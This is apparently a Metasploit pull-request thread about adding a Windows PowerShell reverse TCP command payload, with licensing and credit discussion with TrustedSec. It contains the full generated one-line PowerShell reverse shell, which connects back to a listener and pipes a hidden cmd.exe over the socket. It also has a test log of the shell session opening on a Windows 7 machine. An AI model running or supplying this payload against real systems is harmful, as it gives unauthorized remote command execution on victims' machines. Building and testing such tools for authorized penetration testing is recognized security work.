Windows CMD Powershell Reverse TCP

[Meatballs1]

Windows deserves some decent CMD payloads too.

Looks like I based this on: https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell by way of a random pastebin from google :)

We can use #2964 to reduce badchars :)

[jvazquez-r7]

Ping @trustedsec, in order to give him the opportunity to review/discuss in the pr, since looks like this code is based on code available in his repository.

On the other hand, looking at https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE, looks like we should update our LICENSE file. Not a big deal, we'll do by ourselves at landing time, just writing down to not forget!

[jvazquez-r7]

Tested on Windows 7 successfully:

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.139:49180) at 2014-02-19 14:27:38 -0600

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Juan Vazquez>id

C:\Users\Juan Vazquez>whoamid

C:\Users\Juan Vazquez>whoami
dir
win-rnj7nbrk9l7\juan vazquez

C:\Users\Juan Vazquez> Volume in drive C has no label.
 Volume Serial Number is F482-003D

 Directory of C:\Users\Juan Vazquez

02/10/2014  08:21 PM    <DIR>          .
02/10/2014  08:21 PM    <DIR>          ..
02/10/2014  08:21 PM               812 .recently-used.xbel
06/19/2012  04:09 PM    <DIR>          Contacts
02/10/2014  07:33 PM    <DIR>          Desktop
12/13/2013  06:59 PM    <DIR>          Documents
02/10/2014  08:23 PM    <DIR>          Downloads
06/19/2012  04:09 PM    <DIR>          Favorites
06/19/2012  04:09 PM    <DIR>          Links
06/19/2012  04:09 PM    <DIR>          Music
06/19/2012  04:09 PM    <DIR>          Pictures
06/19/2012  04:09 PM    <DIR>          Saved Games
06/19/2012  04:09 PM    <DIR>          Searches
06/19/2012  04:09 PM    <DIR>          Videos
               1 File(s)            812 bytes
              13 Dir(s)  46,790,037,504 bytes free

C:\Users\Juan Vazquez>exit



[*] 192.168.172.139 - Command shell session 2 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(handler) > Interrupt: use the 'exit' co

Paylaod generated with:

$ ./msfpayload cmd/windows/reverse_powershell LHOST=192.168.172.1 R 
powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='192.168.172.1';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};

[wchen-r7]

@jvazquez-r7 Did you include the license somewhere? If you did, it might be the wrong place, because I'm not seeing it in the LICENSE file.

[Meatballs1]

So the @trustedsec license has:
'feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).'

And so Dave Kennedy is included as one of the module authors which to me satisfies the license terms? :)

[trustedsec]

You guys can use it for whatever you want, don't worry about the credit in MSF =) Take this as my verbal permission to use it for whatever you want inside Metasploit!

[jvazquez-r7]

@wchen-r7 @Meatballs1 @trustedsec see final landing here: aa07065

• Dave is credited as original shellcode author.
• Even when the module is licensed as MSF_LICENSE, there is a comment just above the License, where clarifies which the powershelle code is from SET and copyrighted by TrustedSEC, LLC and BSD licensed (and link to the original license).

More clarifications to be sure there are no issues :) :

• @wchen-r7 the licensing thing was discussed and agreed with @todb-r7 before landing.
• @trustedsec if you think or feel like we're forgetting something about crediting/licensing, please let us know and we'll fix, of course!
• @trustedsec @Meatballs1 great work with the payload! Thanks for allowing it to be available on MSF :)

[Meatballs1]

Much hugs and kisses ;)

[trustedsec]

Hugs and kisses all the way =) Thanks for putting this together it rocks and I'll definitely be using it =)

[mwulftange]

Maybe a heredoc with per-line strip would make this a little more readable:

powershell = <<-EOS.lines.map(&:strip).join
  function RSC{
  …
  }else{RSC}};
EOS